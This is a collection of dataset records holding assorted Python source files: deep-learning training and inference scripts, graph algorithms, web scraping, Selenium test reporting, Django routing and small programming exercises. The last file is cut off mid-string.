def run_infer(self, params):\n \"\"\"\n Function run_infer: Operation method of training node\n Args:\n :params params: the hyper parameters of network\n Returns\n :infer_result, type:dict, record the evalution parameter and program resource usage situation\n \"\"\"\n place = fluid.CPUPlace()\n dataset = py_reader.CriteoDataset(params.sparse_feature_dim)\n file_list = [\n str(params.test_files_path) + \"/%s\" % x\n for x in os.listdir(params.test_files_path)\n ]\n test_reader = paddle.batch(\n dataset.test(file_list), batch_size=params.batch_size)\n startup_program = fluid.framework.Program()\n test_program = fluid.framework.Program()\n\n def set_zero(var_name):\n param = fluid.global_scope().var(var_name).get_tensor()\n param_array = np.zeros(param._get_dims()).astype(\"int64\")\n param.set(param_array, place)\n\n with fluid.framework.program_guard(test_program, startup_program):\n with fluid.unique_name.guard():\n inputs = self.input_data(params)\n loss, auc_var, batch_auc_var= self.net(inputs, params)\n\n exe = fluid.Executor(place)\n feeder = fluid.DataFeeder(feed_list=inputs, place=place)\n\n train_method = ''\n if params.is_pyreader_train:\n train_method = '_pyreader_train/'\n else:\n train_method = '_dataset_train/'\n model_path = params.model_path + '/final' + train_method\n fluid.io.load_persistables(\n executor=exe,\n dirname=model_path,\n main_program=fluid.default_main_program())\n\n auc_states_names = ['_generated_var_0','_generated_var_1','_generated_var_2', '_generated_var_3']\n for name in auc_states_names:\n set_zero(name)\n\n run_index = 0\n infer_auc = 0\n L = []\n for batch_id, data in enumerate(test_reader()):\n loss_val, auc_val = exe.run(test_program,\n feed=feeder.feed(data),\n fetch_list=[loss, auc_var])\n run_index += 1\n infer_auc = auc_val\n L.append(loss_val / params.batch_size)\n if batch_id % 1000 == 0:\n logger.info(\"TEST --> batch: {} loss: {} auc: {}\".format(\n batch_id, loss_val / params.batch_size, auc_val))\n\n infer_loss = np.mean(L)\n infer_result = {}\n infer_result['loss'] = infer_loss\n infer_result['auc'] = infer_auc\n log_path = params.log_path + '/infer_result.log'\n print(str(infer_result))\n with open(log_path, 'w+') as f:\n f.write(str(infer_result))\n logger.info(\"Inference complete\")\n return infer_result\n\n def py_reader(self, params):\n \"\"\"\n Function py_reader: define the data read method by fluid.layers.py_reader\n help: https://www.paddlepaddle.org.cn/documentation/docs/zh/1.5/api_cn/layers_cn/io_cn.html#py-reader\n Args:\n :params params: the hyper parameters of network\n Returns:\n defined by user\n \"\"\"\n raise NotImplementedError(\n \"py_reader should be implemented by child classes.\")\n\n def dataset_reader(self, inputs, params):\n \"\"\"\n Function dataset_reader: define the data read method by fluid.dataset.DatasetFactory\n help: https://www.paddlepaddle.org.cn/documentation/docs/zh/1.5/api_cn/dataset_cn.html#fluid-dataset\n Args:\n :params inputs: input data, eg: dataset and labels. defined by funtion: self.input_data\n :params params: the hyper parameters of network\n Returns:\n defined by user\n \"\"\"\n raise NotImplementedError(\n \"dataset_reader should be implemented by child classes.\")\n\n def record_time(self, epoch, train_result, time):\n \"\"\"\n record the operation time\n \"\"\"\n train_result[epoch] = {}\n train_result[epoch]['time'] = time\n return train_result\n\n def record_memory(self, epoch, train_result):\n info = process_info()\n logger.info(info)\n train_result[epoch]['memory'] = info['mem']\n train_result[epoch]['cpu'] = info['cpu']\n train_result[epoch]['rss'] = info['rss']\n train_result[epoch]['vsa'] = info['vsa']\n return train_result\n \n def runtime_main(self, params):\n \"\"\"\n Function runtime_main: the entry point for program running\n Args:\n :params params: the hyper parameters of network\n \"\"\"\n\n # Step1: get the environment variable, mainly related to network communication parameters\n params.role = os.getenv(\"TRAINING_ROLE\")\n logger.info(\"Training role: {}\".format(params.role))\n\n params.current_id = int(os.getenv(\"PADDLE_TRAINER_ID\"))\n logger.info(\"Current Id: {}\".format(params.current_id))\n\n params.trainers = int(os.getenv(\"PADDLE_TRAINERS_NUM\"))\n logger.info(\"Trainer num: {}\".format(params.trainers))\n\n params.pserver_ports = os.getenv(\"PADDLE_PORT\")\n logger.info(\"Pserver ports: {}\".format(params.pserver_ports))\n\n params.pserver_ip = os.getenv(\"PADDLE_PSERVERS\")\n logger.info(\"Pserver IP: {}\".format(params.pserver_ip))\n\n params.current_endpoint = os.getenv(\"POD_IP\", \"localhost\") + \":\" + params.pserver_ports\n\n params.cpu_num = int(os.getenv(\"CPU_NUM\"))\n logger.info(\"cpu num: {}\".format(params.cpu_num))\n\n # Step2: decide communication mode between PSERVER & TRAINER\n # recommended mode: pyreader + sync_mode / dataset + async_mode\n self.strategy = DistributeTranspilerConfig()\n if params.sync_mode == 'sync':\n self.strategy.sync_mode = True\n self.strategy.runtime_split_send_recv = False\n self.async_mode = False\n params.batch_size = int(params.batch_size / params.trainers)\n elif params.sync_mode == 'half_async':\n self.strategy.sync_mode = False\n self.async_mode = False\n self.strategy.runtime_split_send_recv = False\n elif params.sync_mode == 'async' or params.is_dataset_train:\n self.strategy.sync_mode = False\n self.async_mode = True\n self.strategy.runtime_split_send_recv = True\n\n # Step3: Configure communication IP and ports\n # If we use local cluster simulate real distributed environment:\n # -- PSERVER have same IP but different port\n # In the real distributed cluster computing environment:\n # -- PSERVER have same port but different IP\n if params.is_local_cluster:\n for port in params.pserver_ports.split(\",\"):\n params.pserver_endpoints.append(':'.join(\n [params.pserver_ip, port]))\n else:\n for ip in params.pserver_ip.split(\",\"):\n params.pserver_endpoints.append(':'.join(\n [ip, params.pserver_ports]))\n\n params.endpoints = \",\".join(params.pserver_endpoints)\n logger.info(\"pserver_endpoints: {}\".format(params.pserver_endpoints))\n\n if params.role == \"TRAINER\" and params.current_id == 0:\n params.is_first_trainer = True\n\n # Step4: According to the environment parameters-> TRAINING_ROLE, decide which method to run\n train_result = {}\n if params.role == \"PSERVER\":\n self.run_pserver(params)\n elif params.role == \"TRAINER\":\n if params.is_dataset_train:\n train_result = self.run_dataset_trainer(params)\n elif params.is_pyreader_train:\n train_result = self.run_pyreader_trainer(params)\n else:\n raise ValueError(\"Please choice training role for current node : PSERVER / TRAINER\")\n \n # Step5: If the role is first trainer, after training, perform verification on the test data\n result = dict()\n infer_result = {}\n if params.is_first_trainer:\n infer_result = self.run_infer(params)\n result[0] = dict()\n result[0]['loss'] = infer_result['loss']\n result[0]['auc'] = infer_result['auc']\n result[1] = train_result[0]['time']\n elif params.role == \"TRAINER\" and params.current_id != 0:\n result[1] = train_result[0]['time']\n result_path = params.log_path + '/' + str(params.current_id) + '_result.log'\n with open(result_path, 'w') as f:\n f.write(str(result))\n\n logger.info(\"Distribute train success!\")\n\ndef process_info():\n pid = os.getpid()\n res = commands.getstatusoutput('ps aux|grep ' + str(pid))[1].split('\\n')[0]\n p = re.compile(r'\\s+')\n l = p.split(res)\n info = {'user': l[0],\n 'pid': l[1],\n 'cpu': l[2],\n 'mem': l[3],\n 'vsa': l[4],\n 'rss': l[5], }\n return info\n","sub_path":"examples/distribute_ctr/distribute_base.py","file_name":"distribute_base.py","file_ext":"py","file_size_in_byte":22072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"226646206","text":"#!/usr/bin/python3\n\nfrom itertools import product\nfrom functools import reduce\nfrom copy import deepcopy\n\n\n\ndef point_and_neighbors(point):\n x, y = point\n return {(x + dx, y + dy) for dx, dy in product([-1, 0, +1], [-1, 0, +1])}\n\n\ndef all_neighbors(points):\n return reduce(\n lambda a, b: a | b,\n map(lambda point: point_and_neighbors(point), points),\n set()\n ) - set(points)\n\n\ndef neighbors(points, graph):\n return all_neighbors(points) & graph\n\n\ndef connectivity_components(graph):\n points = deepcopy(graph)\n components = []\n current_component = set()\n while points:\n start_point = points.pop()\n current_component = {start_point}\n neighborhood = neighbors(current_component, points)\n while neighborhood:\n current_component |= neighborhood\n points -= neighborhood\n neighborhood = neighbors(neighborhood, points)\n components.append(current_component)\n return components\n\n\ndef mass_center(points):\n if not points:\n raise ZeroDivisionError(\"points must be not empty\")\n center = reduce(lambda a, b: (a[0]+b[0], a[1]+b[1]), points, (0, 0))\n return (center[0] * 1. / len(points), center[1] * 1. / len(points))\n\n\n\n\n\n\n\n\n# if __name__ == '__main__':\n \n# c1 = {\n# (0, 0), (0, 1), (1, 1), (1, 0), (2, 1), (1, 2),\n# (2, 2), (3, 1), (1, 3), (3, 2), (2, 3), (3, 3), \n# (4, 2), (5, 2), (4, 3), (5, 3), \n# (2, 4), (2, 5), (3, 4), (3, 5), \n# (4, 4), (4, 5), (5, 4), (5, 5)\n# } \n# c2 = {\n# (7, 0), (8, 0), (7, 1), (7, 2)\n# } \n# c3 = {\n# (7, 4), (8, 4), (8, 5)\n# }\n\n# graph = c1 | c2 | c3\n\n# print mass_center(c1)\n# print mass_center(c2)\n# print mass_center(c3)\n\n# print connectivity_components(graph)\n\n \n\n","sub_path":"src/graph_utils.py","file_name":"graph_utils.py","file_ext":"py","file_size_in_byte":1828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"633227221","text":"from urllib.request import urlopen\nfrom bs4 import BeautifulSoup\n\nhtml = urlopen(\"https://stepik.org/media/attachments/lesson/209723/3.html\").read().decode(\"utf-8\")\nsoup = BeautifulSoup(html, 'html.parser')\nelements = soup.find_all('td')\nsum = 0\nfor i in elements:\n sum += int(i.contents[0])\nprint(sum)\n","sub_path":"1_beautifulsoup_web_pages_parsing/1_4_1_table_parsing.py","file_name":"1_4_1_table_parsing.py","file_ext":"py","file_size_in_byte":306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"281269162","text":"from keras_retinanet import models\nfrom keras_retinanet.preprocessing.csv_generator import CSVGenerator\nimport numpy as np\nfrom keras_retinanet.utils.image import read_image_bgr, preprocess_image, resize_image\nfrom keras_retinanet.utils.visualization import draw_box, draw_caption\nfrom keras_retinanet.utils.colors import label_color\n\n# import miscellaneous modules\nimport matplotlib.pyplot as plt\nimport cv2\nimport os\n\n\nmodel = models.load_model('/home/nader/scratch/resnet50_csv_50_inf.h5', backbone_name='resnet50')\n# anns = '/home/nader/scratch/anns_test.csv'\nanns = '/home/nader/scratch/inf_boxes_huon_13_ans.csv'\ncls = '/home/nader/scratch/classes.csv'\n\nvalidation_generator = CSVGenerator(anns, cls)\n\n# ims = np.array(())\n# for i in range(validation_generator.size()):\n# im = validation_generator.load_image(i)\n# ims.append(im)\n# print(np.shape(ims))\n\nfor i in range(validation_generator.size()):\n im = validation_generator.load_image(i)\n # im = np.reshape(im,(1,1024,1360,3))\n # copy to draw on\n draw = im.copy()\n draw = cv2.cvtColor(draw, cv2.COLOR_BGR2RGB)\n\n # preprocess image for network\n im = preprocess_image(im)\n im, scale = resize_image(im)\n\n\n labels_to_names = {0: 'lobster'}\n\n boxes,scores,labels = model.predict_on_batch(np.expand_dims(im, axis=0))\n\n\n\n # correct for image scale\n boxes /= scale\n for box, score, label in zip(boxes[0], scores[0], labels[0]):\n # scores are sorted so we can break\n if score < 0.5:\n break\n\n color = label_color(label)\n\n b = box.astype(int)\n draw_box(draw, b, color=color)\n\n caption = \"{} {:.3f}\".format(labels_to_names[label], score)\n draw_caption(draw, b, caption)\n print(score)\n plt.figure(figsize=(15, 15))\n plt.axis('off')\n plt.imshow(draw)\n plt.show()\n # imname = validation_generator.image_names[i][:-4]+'out.png'\n # cv2.imwrite(imname, draw)\n\n# cv2.imwrite('out.png', draw)","sub_path":"retinanet_inf.py","file_name":"retinanet_inf.py","file_ext":"py","file_size_in_byte":1961,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"524470890","text":"def throwHand(card):\n\tif card == \"a\":\n\t\ttmp = handA[0]\n\t\tlist(handA).pop(0)\n\telif card == \"b\":\n\t\ttmp = handB[0]\n\t\tlist(handB).pop(0)\n\telif card == \"c\":\n\t\ttmp = handC[0]\n\t\tlist(handC).pop(0)\n\t\n\treturn tmp\n\n\nhandA = input()\nhandB = input()\nhandC = input()\nlist(handA)\nlist(handB)\nlist(handC)\ntmpMain = throwHand(handA[0])\n\nwhile len(handA) > 0 or len(handB) > 0 or len(handC):\n\ttmpMain = throwHand(tmpMain)\n\nprint(tmpMain)","sub_path":"inazuma/python/Bprob/045.py","file_name":"045.py","file_ext":"py","file_size_in_byte":420,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"306246475","text":"import os\nfrom selenium import webdriver\nfrom pathlib import Path\n\n\"\"\"\nFlow\nStore the path to all files reports from robot report.html in a list\nOpen each file using for loop\nOnce opened, scrap the page to get the test status\nStore the test name and the status in a list\nAt the end, output the list test name and result to one flake_report.html\n\nIMPORTANT: Need to have the output directory previously created.\n\"\"\"\n\n\nclass FlakeTestsReport:\n\n def __init__(self, in_path: str, out_path: str):\n self.driver = None\n self.root_path = in_path\n self.files_list = []\n self.output_directory = out_path\n\n @staticmethod\n def get_build_number_sort(elem):\n return str(elem).split('-')[0]\n\n def get_files_path(self):\n logs_name = os.listdir(self.root_path)\n logs_name.sort(key=FlakeTestsReport.get_build_number_sort)\n\n for ln in logs_name:\n self.files_list.append(self.root_path + ln)\n\n def get_reports_status(self):\n self.driver = webdriver.Firefox(executable_path=os.getcwd() + '/geckodriver')\n final_list = []\n\n for fl in self.files_list:\n build_number = str(fl).split('/')[-1].split('-')[0]\n self.driver.get('file://' + fl)\n self.driver.find_element_by_id('radio-critical').click()\n test_name = self.driver.find_elements_by_xpath('//td[@class=\"details-col-name\"]')\n test_result = self.driver.find_elements_by_xpath('//td[@class=\"details-col-status\"]')\n list_size = len(test_name)\n\n for i in range(list_size):\n test = [build_number, test_name[i].text, test_result[i].text]\n if test not in final_list:\n final_list.append(test)\n else:\n index = final_list.index(test)\n final_list[index].insert(len(test), test[2])\n self.driver.quit()\n\n return final_list\n\n def generate_final_report(self, final_list: list, first_build: int, last_build: int):\n\n # Create the build header for report\n build_header = ''\n for bq in range((last_build + 1) - first_build):\n build_header = build_header + 'Build ' + str(first_build + bq) + ''\n\n new_column = ''\n test = ''\n\n for fl in final_list:\n results = fl[2:]\n color_result = ''\n for r in results:\n if r.__eq__('PASS'):\n color_result = color_result + '' + r + ''\n else:\n color_result = color_result + '' + r + ''\n\n test = test + '' + fl[1] + '' + (int(fl[0]) - first_build) * new_column + color_result + ''\n\n return 'Test Name' + build_header + '' + test\n\n def output_html(self, tests_result: str):\n header = \"\"\"\n \n \n Flake tests report\n \n \n \n \"\"\"\n\n footer = \"\"\"\n
\n \n \n \"\"\"\n html = header + tests_result + footer\n\n Path(self.output_directory).mkdir(parents=True, exist_ok=True)\n report = open(self.output_directory + '/flake_report.html', 'w')\n report.write(html)\n report.close()\n","sub_path":"get_tests_results.py","file_name":"get_tests_results.py","file_ext":"py","file_size_in_byte":3715,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"636594145","text":"import sys\n\n# No cycle graph, just find the path, shortest path, topo sort\ng = {}\ng[0] = set([1,3])\ng[1] = set([2])\ng[2] = set([5])\ng[3] = set([4])\ng[4] = set([7])\ng[5] = set([6])\ng[6] = set([7])\ng[7] = set()\n# print(g)\ndef printEdge(g):\n\tfor v in g:\n\t\tprint('edges from %s' % (v))\n\t\tfor n in g[v]:\n\t\t\tprint(\"%s -- > %s\" % (v,n)),\n\t\tprint('\\b')\n\ndef isPath(g, v1, v2):\n\tq = [v1]\n\twhile q:\n\t\ttemp = q.pop(0)\n\t\tif temp == v2:\n\t\t\treturn True\n\t\tfor x in g[temp]:\n\t\t\tif x not in q:\n\t\t\t\tq.append(x)\n\treturn False\n\ndef printPath(g, v1, v2):\n\tres = []\n\tdef helper(res, v1, v2, sub):\n\t\tif v1 == v2 :\n\t\t\tres.append(sub + [v1])\n\t\tfor v in g[v1]:\n\t\t\thelper(res, v, v2, sub + [v1])\n\n\thelper(res, v1, v2, [])\n\tprint('All paths from %s to %s' % (v1, v2))\n\tprint(res)\n\treturn res\n\ndef shorestPath(g, v1, v2):\n\tq, res = [[v1]], []\n\tcnt = 1\n\tdef helper(level):\n\t\tres = []\n\t\tfor n in level:\n\t\t\tfor x in g[n]:\n\t\t\t\tif x not in res:\n\t\t\t\t\tres.append(x)\n\t\treturn res\n\twhile q:\n\t\ttemp = q.pop(0)\n\t\tfor n in temp:\n\t\t\tif n == v2:\n\t\t\t\tprint(cnt)\n\t\t\t\treturn cnt\n\t\tlevel = helper(temp)\n\t\tif level:\n\t\t\tq.append(helper(temp))\n\t\t\tcnt += 1\n\tprint('NO Path')\n\n\nprintEdge(g)\nprint(isPath(g, 2,3))\nprintPath(g,0,7)\nshorestPath(g, 2, 3)\n\ng = {}\ng[0] = set([(1,1),(2,2),(4,0)])\ng[1] = set([(4,4)])\ng[2] = set([(3,3)])\ng[3] = set([(4,1)])\ng[4] = set([])\n\nprintEdge(g)\nimport heapq\n# find the shortest path to all vertices from source\ndef Dijkstra(g, v):\n\tdis = {}\n\theapmap = []\n\tparent = {}\n\n\t## in a heapmap, initialize all v with distance infinite\n\tfor v in g:\n\t\theapmap\n\n#bipartie, cycle, trie\n# anyway, maybe work on the bipartie graph first\ng = {}\ng[0] = set([3])\ng[1] = set([3,4])\ng[2] = set([4])\ng[3] = set([0,1])\ng[4] = set([1,2])\n\ndef biparte(g):\n\td = {x: None for x in g}\n\tq = [0]\n\twhile q:\n\t\ttemp = q.pop(0)\n\t\tcolor = d[temp]\n\t\tfor n in g[temp]:\n\t\t\tif d[n] == None:\n\t\t\t\tq.append(n)\n\t\t\t\td[n] = not color\n\t\t\tif d[n] == color:\n\t\t\t\treturn False\n\tprint(d)\n\treturn True\n\n#if edges are numbered \ndef biparte2(g):\n\td = ['None' for x in g]\n\td[0] = 'W'\n\tq = [0]\n\twhile q:\n\t\ttemp = q.pop(0)\n\t\tcolor = d[temp]\t\n\t\tfor n in g[temp]:\n\t\t\tif d[n] == 'None':\n\t\t\t\tq.append(n)\n\t\t\t\tif d[temp] == 'W':\n\t\t\t\t\td[n] = 'B'\n\t\t\t\tif d[temp] == 'B':\n\t\t\t\t\td[n] = 'W'\n\t\t\tif d[n] == d[temp]:\n\t\t\t\treturn False\n\treturn True\n\nbiparte2(g)\n\n\n#cycle in a graph\ng = {}\ng[1] = set([2,3,4])\ng[2] = set([3])\ng[3] = set([])\ng[4] = set([5])\ng[5] = set([6])\ng[6] = set([])\nprint(g)\n\ndef isCycle(g):\n\twhite = g.keys()\n\tgrey = []\n\tblack = []\n\n\twhile white:\n\t\tcur = white[0]\n\t\tif dfs(cur, white, grey, black):\n\t\t\treturn True\n\treturn False\n\ndef dfs (cur, white, grey, black):\n\tmove_vertex (cur, white, grey)\n\tfor n in g[cur]:\n\t\tif n in black:\n\t\t\tcontinue\n\t\tif n in grey:\n\t\t\treturn True\n\t\tif dfs(n,white,grey,black):\n\t\t\treturn True\n\tmove_vertex(cur, grey, black)\n\treturn False\n\ndef move_vertex(v, source, dest):\n\tprint(v,source, dest)\n\tsource.remove(v)\n\tdest.append(v)\n\nprint(isCycle(g))","sub_path":"graph2.py","file_name":"graph2.py","file_ext":"py","file_size_in_byte":2906,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"50571294","text":"from django.conf.urls import url\nfrom .views import *\n\nurlpatterns = [\n url(r'^$', index_views),\n url(r'^index/$', index_views),\n url(r'^login/$', login),\n url(r'^register/$', register),\n]\n\nurlpatterns += [\n url(r'^temp01/$', temp01),\n url(r'^temp02/$', temp02),\n url(r'^temp03/$', temp03_static),\n]\n\n\n\n","sub_path":"django_demo1/index/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"404897765","text":"print(\"yut\")\n\"\"\"\nThis is me messing around with bitwise operators and checking different uses\nfor each sign\n\nPython 3.8\nJP Valentine\n9/13/2020\n\"\"\"\n\na=255 #1111 1111\nb=0 #0000 0000\nc=170 #1010 1010\nd=85 #0101 0101\ne=15 #0000 1111\nf=240 #1111 0000\n\ndef setBlank():\n \"\"\"\n resets each variable to their original values\n \"\"\"\n a=255 #1111 1111\n b=0 #0000 0000\n c=170 #1010 1010\n d=85 #0101 0101\n e=15 #0000 1111\n f=240 #1111 0000\n\ndef bitVal(n):\n \"\"\"\n prints int no bigger than 255 and displays the bit value of\n the int\n :param n:takes an int to be printed\n :return: returns a string with the bit value\n \"\"\"\n x=128\n n=abs(n)\n new=\"\"#new value to be printed\n for i in range(8):\n if n>=x:\n n=n-x\n new=new+\"1\"\n else:\n new=new+\"0\"\n x=x/2\n return new\n\ndef parity(n):\n \"\"\"\n parity checking function that can do 64 bit numbers prints out 1 or zero at\n the end\n \"param n\" number to be checked\n \"\"\"\n n ^= n>>32\n n ^= n>>16\n n ^= n>>8\n n ^= n>>4\n n ^= n>>2\n n ^= n>>1\n print(n&1)\n\ndef bitSwap(n,i,j):\n \"\"\"\n swaping bits on a number\n :param n: number to have bits swapped\n :param i: first position in which the bit should be swapped\n :param j: second position in whick the bit should be swapped\n \"\"\"\n if (n>>i)&1 != (n>>j)&1:#shift right on n until i and j postions then check if that bit is the same\n bitMask = (1<>3\nprint(b)\nprint(bitVal(b))\nb=0\nif (a>>8)==b:\n print(\"Worked!\")\nq=0\nprint(bitVal(~q))\nprint(\"-------------\")\nparity(254)\nbitSwap(255,8,1)\n","sub_path":"quickProj/bitFun.py","file_name":"bitFun.py","file_ext":"py","file_size_in_byte":1939,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"52199673","text":"# coding: utf-8\nfrom base.LinkedList import SinglyNode\nfrom base.LinkedList import SinglyList\n\n\n# 問題:\n# ソートされていない連結リストから、重複する要素を削除するコードを書いてください。\n# 発展問題: もし、一時的なバッファが使用できないとすれば、どうやってこの問題を解きますか?\n\n# 方針:\n# 一度値が出現したかどうかを、ハッシュを用いて判定する。O(n)\n# ハッシュはバッファを要するため、それが使えない場合、\n# 2つのインデックスを用意し、2重ループで総スキャンし同要素を検出する。O(n^2)\n\n# 実装:\n# base/LinkedList.pyに、クラスメソッドとして実装した。\n# コメントに\"question 2.1\"と書かれている関数がそれにあたる。\n\n# 以下、簡単な動作テスト\n\nLList = SinglyList()\nLList2 = SinglyList()\n\ntest_values = [1, 1, 2, 3, 4, 5, 5, 4, 6]\n\nfor value in test_values:\n LList.append(value)\n LList2.append(value)\n\nLList.delete_duplicate()\nLList2.delete_duplicate_less_mem()\n\nprint(\"check value\")\nprint(LList)\nprint(LList2)","sub_path":"CrackingTheCodingInterview_v5/Chapter2_LinkedList/2_1.py","file_name":"2_1.py","file_ext":"py","file_size_in_byte":1132,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"595941784","text":"import os\nimport random\nimport numpy as np\nimport cv2\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\nfrom tensorflow import keras\nfrom keras.layers import Conv2D, MaxPooling2D, UpSampling2D, Concatenate\nfrom keras.layers import Input, BatchNormalization, Activation, Add, Layer, Flatten\nfrom keras.models import Model\n\nseed = 2020\nrandom.seed = seed\nnp.random.seed = seed\ntf.seed = seed\n\nclass DataGen(keras.utils.Sequence):\n def __init__(self, ids, path, batch_size=8, image_size=128):\n self.ids = ids\n self.path = path\n self.batch_size = batch_size\n self.image_size = image_size\n self.on_epoch_end()\n \n def __load__(self, id_name):\n image_path = os.path.join(self.path, id_name, \"images\", id_name) + \".png\"\n image = cv2.imread(image_path, 1)\n image = cv2.resize(image, (self.image_size, self.image_size))\n \n image = image/255.0\n return image\n \n def __getitem__(self, index):\n if (index+1)*self.batch_size > len(self.ids):\n self.batch_size = len(self.ids) - index*self.batch_size\n \n file_batch = self.ids[index*self.batch_size : (index+1)*self.batch_size]\n \n image = []\n for id_name in file_batch:\n _img = self.__load__(id_name)\n image.append(_img) \n image = np.array(image)\n \n return image\n def on_epoch_end(self):\n pass\n \n def __len__(self):\n return int(np.ceil(len(self.ids)/float(self.batch_size)))\n \n\ndef down_block(x, filters, kernel_size=(3,3), padding=\"same\", strides=1):\n c = Conv2D(filters, kernel_size, padding=padding, strides=strides, activation=\"relu\")(x)\n c = Conv2D(filters, kernel_size, padding=padding, strides=strides, activation=\"relu\")(c)\n p = MaxPooling2D((2,2), (2,2))(c)\n return c, p\n\ndef up_block(x, skip, filters, kernel_size=(3,3), padding=\"same\", strides=1):\n us = UpSampling2D((2, 2))(x)\n concat = Concatenate()([us, skip])\n c = Conv2D(filters, kernel_size, padding=padding, strides=strides, activation=\"relu\")(concat)\n c = Conv2D(filters, kernel_size, padding=padding, strides=strides, activation=\"relu\")(c) \n return c\n\ndef bottleneck(x, filters, kernel_size=(3,3), padding=\"same\", strides=1):\n c = Conv2D(filters, kernel_size, padding=padding, strides=strides)(x)\n c = Conv2D(filters, kernel_size, padding=padding, strides=strides)(c)\n return c\n\ndef UNet():\n f = [16, 32, 64, 128, 256]\n inputs = Input((IMAGE_SIZE, IMAGE_SIZE, 3))\n \n p0 = inputs\n c1, p1 = down_block(p0, f[0]) # 128->64\n c2, p2 = down_block(p1, f[1]) # 64->32\n c3, p3 = down_block(p2, f[2]) # 32->16\n c4, p4 = down_block(p3, f[3]) # 16->8\n \n bn = bottleneck(p4, f[4])\n \n u1 = up_block(bn, c4, f[3]) # 8->16\n u2 = up_block(u1, c3, f[2]) # 16->32\n u3 = up_block(u2, c2, f[1]) # 32->64\n u4 = up_block(u3, c1, f[0]) # 64->128\n \n outputs = Conv2D(1, (1,1), padding=\"same\", activation=\"sigmoid\")(u4)\n model = Model(inputs, outputs)\n return model\n\ndef bn_act(x, act=True):\n x = BatchNormalization()(x)\n if act == True:\n x = Activation(\"relu\")(x)\n return x\n\ndef conv_block(x, filters, kernel_size=(3,3), padding=\"same\", strides=1):\n conv = bn_act(x)\n conv = Conv2D(filters, kernel_size, padding=padding, strides=strides)(conv)\n return conv\n\ndef stem(x, filters, kernel_size=(3,3), padding=\"same\", strides=1):\n conv = Conv2D(filters, kernel_size, padding=padding, strides=strides)(x)\n conv = conv_block(conv, filters, kernel_size=kernel_size, padding=padding, strides=strides)\n \n shortcut = Conv2D(filters, kernel_size=(1,1), padding=padding, strides=strides)(x)\n shortcut = bn_act(shortcut, act=False)\n \n output = Add()([conv, shortcut])\n return output\n\ndef residual_block(x, filters, kernel_size=(3,3), padding=\"same\", strides=1):\n res = conv_block(x, filters, kernel_size=kernel_size, padding=padding, strides=strides)\n res = conv_block(res, filters, kernel_size=kernel_size, padding=padding, strides=1) \n \n shortcut = Conv2D(filters, kernel_size=(1,1), padding=padding, strides=strides)(x)\n shortcut = bn_act(shortcut, act=False)\n \n output = Add()([res, shortcut])\n return output\n\ndef upsample_concat_block(x, xskip):\n u = UpSampling2D((2, 2))(x)\n concat = Concatenate()([u ,xskip])\n return concat\n\n#### ResUnet ###\ndef ResUNet():\n f = [16, 32, 64, 128, 256]\n inputs = Input((IMAGE_SIZE, IMAGE_SIZE, 3))\n \n # ENCODER\n e0 = inputs\n e1 = stem(e0, f[0])\n e2 = residual_block(e1, f[1], strides=2)\n e3 = residual_block(e2, f[2], strides=2)\n e4 = residual_block(e3, f[3], strides=2)\n e5 = residual_block(e4, f[4], strides=2)\n \n # BRIDGE\n b0 = conv_block(e5, f[4], strides=1)\n b1 = conv_block(b0, f[4], strides=1)\n \n # DECODER\n u1 = upsample_concat_block(b1, e4)\n d1 = residual_block(u1, f[4]) \n \n u2 = upsample_concat_block(d1, e3)\n d2 = residual_block(u2, f[3])\n \n u3 = upsample_concat_block(d2, e2)\n d3 = residual_block(u3, f[2])\n \n u4 = upsample_concat_block(d3, e1)\n d4 = residual_block(u4, f[1])\n \n outputs = Conv2D(1, (1,1), padding=\"same\", activation=\"sigmoid\")(d4)\n model = Model(inputs, outputs)\n return model\n\n\nIMAGE_SIZE = 128\nTEST_PATH = \"dataset/test/\"\nBATCH_SIZE = 65\n\ntest_ids = next(os.walk(TEST_PATH))[1]\n\ngen = DataGen(test_ids, TEST_PATH, batch_size=BATCH_SIZE, image_size=IMAGE_SIZE)\nx= gen.__getitem__(0)\nprint(x.shape)\n\nmodel1 = UNet()\nmodel2 = ResUNet()\n\nmodel2.load_weights('ResUNet.h5')\nmodel1.load_weights('UNetW.h5')\n\nresult1 = model1.predict(x)\nresult1 = result1 > 0.5\n\nresult2 = model2.predict(x)\nresult2 = result2 > 0.5\n\n\nfig = plt.figure()\nfig.subplots_adjust(hspace=0.4, wspace=0.4)\nax = fig.add_subplot(1,2,1)\nax.imshow(x[17])\nplt.title(\"Original Image\")\n# ax = fig.add_subplot(1,3,2)\n# ax.imshow(np.reshape(result1[17]*255, (IMAGE_SIZE, IMAGE_SIZE)), cmap=\"gray\")\n# plt.title(\"UNet Mask\")\nax = fig.add_subplot(1,2,2)\nax.imshow(np.reshape(result2[17]*255, (IMAGE_SIZE, IMAGE_SIZE)), cmap=\"gray\")\nplt.title(\"ResUNet Mask\")\nplt.show()\n\n\n\n\n\n\n\n\n","sub_path":"backend/ml_files/throat-tumor/throat_predict.py","file_name":"throat_predict.py","file_ext":"py","file_size_in_byte":6170,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"75783785","text":"import xml.etree.ElementTree as ET\nimport urllib2\n\nURL = 'https://www.fazerfoodco.fi/modules/MenuRss/MenuRss/CurrentWeek?costNumber=0436&language=fi'\n\nxml = urllib2.urlopen(URL)\n\ntree = ET.parse(xml)\nroot = tree.getroot()\n\nstring = ''\nfor child in root:\n for child2 in child:\n if child2.tag == 'title':\n string += '

' + str(child2.text.encode(\"utf-8\")) + '

'\n if child2.tag == 'item':\n for child3 in child2:\n if child3.tag == 'title':\n string += '

